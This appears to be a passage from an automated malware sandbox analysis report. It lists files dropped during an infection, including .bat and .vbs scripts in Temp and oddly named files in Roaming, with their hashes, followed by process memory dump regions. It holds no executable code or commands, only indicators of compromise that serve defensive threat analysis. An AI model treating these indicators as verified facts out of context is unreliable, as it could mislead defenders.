    af667295e8d9d0582c76b18f6f4665bf6f22d0693cb36e55c5d31d6fa99f48cc

    SHA512

    3eddd456de350c50b9f18a259af572167f47afb28f42968ba716e9aa8c0d07d65fa5fcbeda1057f3382532bc04e0675c336a901c6c497ddcae5778d7c2ba8fb3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d4ff23c124ae23955d34ae2a7306099a

    SHA1

    b814e3331a09a27acfcd114d0c8fcb07957940a3

    SHA256

    1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

    SHA512

    f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Bedstevennens.bat
    Filesize

    4KB

    MD5

    8bb9cfef660160c41937bfa56c08be8b

    SHA1

    95315498f2528f22b3eb1a92a358b3c8c2557565

    SHA256

    1e62122bbacc6a81ea620657d8af2351d9cbf2b62b8ad72f95e765d3089f7332

    SHA512

    f1809b25970a748a1aadb158991f77fa478d548cadc1650d40a999c4c96c8d21f93e2d0186e2ca3dc36416ff57e8128b949dfc58d12a8b2caf71f929817a4321

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Objektiviseringens.vbs
    Filesize

    10KB

    MD5

    f002055fc7992f9d09ada41737d25973

    SHA1

    078f5e9377fa1cc9cc5a9bc557eb7de9c80fa4f6

    SHA256

    81d93fa88e39efd0747d7ac7a6bca7e9005644aae4aafa14a9a9c3d3559b76e0

    SHA512

    6825c0b4135c832f466d7d1972470994bde74dbd9b01507bfd267021f5443dffcf98a67d0c13765328a534676531ab4a4f3dde90a1c8b8ef704558e49fe349ba

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0n4u1z4w.ty0.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\efaxytwmxfhaejfkucgdf
    Filesize

    4KB

    MD5

    17eece3240d08aa4811cf1007cfe2585

    SHA1

    6c10329f61455d1c96e041b6f89ee6260af3bd0f

    SHA256

    7cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903

    SHA512

    a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Alkyds.jen
    Filesize

    471KB

    MD5

    0c1bd4714e1e2f1c31b42e526323957a

    SHA1

    4f350493ebb7c4ad88abb518573bdb7d9c134e41

    SHA256

    6839db073eb5646cbea13e6ba3256f6ff3b9cadd96349ee95d5c3ae588cd5362

    SHA512

    d03f7b9c9eabbc75e54e71b69f73a2971d135e98f8641c135f00c4f3dc26790dfbacf6cda62498b838a585ccb1955a00bb8c635bdb19e35182d361cda7d16b18

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Redbuds.Dip
    Filesize

    463KB

    MD5

    bf9d323f326e0ac2bc6650f6e9f36131

    SHA1

    a2bcc08dfb366743fd70519c534d480c411b7002

    SHA256

    79d596c1d3bbc0b342e087647b307aabe0235db433574f173a3a649d06b07c73

    SHA512

    f082cec0a18b35c943cfdb97b8ef25023f80716dc9b997c0371fdb3e042e7cb5d5c3527d6c6d8fd5f1ff83ea1ff1efee806abc4b2b35d0ad1b5ceb4824fc1c31

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Refleksbevgelsen.Owl
    Filesize

    492KB

    MD5

    ae539ac78cb0f35f03ce684e6d6590e0

    SHA1

    c27e0dcc69a455dfb44cdf5b64b8a1d39292a430

    SHA256

    c49f5790ac3c22cadfe47c9e646f49b15a7b387889b51be4e22c4cacb6010292

    SHA512

    d9d5135d32dffb6eea17d8935ef8b18f60e2146a1a6bcaca1caa19a16e822194d466938e12c8dd90a6d576564bf05017616b82b24e414a1d06ecc6e22027b1e8

    Download Submit

  • memory/440-52-0x0000000026650000-0x00000000278A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/440-23-0x00000000046A0000-0x00000000046D6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/440-39-0x0000000005C70000-0x0000000005C8E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/440-40-0x0000000006280000-0x00000000062CC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/440-41-0x00000000072E0000-0x000000000795A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/440-42-0x00000000061A0000-0x00000000061BA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/440-43-0x0000000006F00000-0x0000000006F96000-memory.dmp

    Filesize

    600KB

    Download

  • memory/440-44-0x0000000006E90000-0x0000000006EB2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/440-45-0x0000000007F10000-0x00000000084B4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/440-31-0x00000000055C0000-0x0000000005626000-memory.dmp

    Filesize

    408KB

    Download

  • memory/440-47-0x00000000084C0000-0x000000000CF34000-memory.dmp

    Filesize

    74.5MB

    Download

  • memory/440-33-0x00000000056A0000-0x00000000059F4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/440-53-0x0000000026650000-0x00000000278A4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/440-32-0x0000000005630000-0x0000000005696000-memory.dmp

    Filesize

    408KB

    Download

  • memory/440-100-0x0000000007EA0000-0x0000000007EB9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/440-103-0x0000000007EA0000-0x0000000007EB9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/440-24-0x0000000004DC0000-0x00000000053E8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/440-104-0x0000000007EA0000-0x0000000007EB9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/440-30-0x0000000005520000-0x0000000005542000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1408-19-0x00007FF8ABDA0000-0x00007FF8AC861000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1408-3-0x000002264DF00000-0x000002264DF22000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1408-13-0x00007FF8ABDA0000-0x00007FF8AC861000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1408-14-0x00007FF8ABDA0000-0x00007FF8AC861000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1408-17-0x00007FF8ABDA0000-0x00007FF8AC861000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1408-18-0x00007FF8ABDA3000-0x00007FF8ABDA5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1408-2-0x00007FF8ABDA3000-0x00007FF8ABDA5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1408-22-0x00007FF8ABDA0000-0x00007FF8AC861000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1612-65-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1612-69-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1612-68-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/4088-72-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/4088-63-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/4088-67-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/4384-160-0x0000000008A00000-0x000000000A3C9000-memory.dmp

    Filesize

    25.8MB

    Download

  • memory/4936-159-0x0000000008E10000-0x000000000B0CC000-memory.dmp

    Filesize

    34.7MB

    Download

  • memory/5096-73-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/5096-66-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/5096-64-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download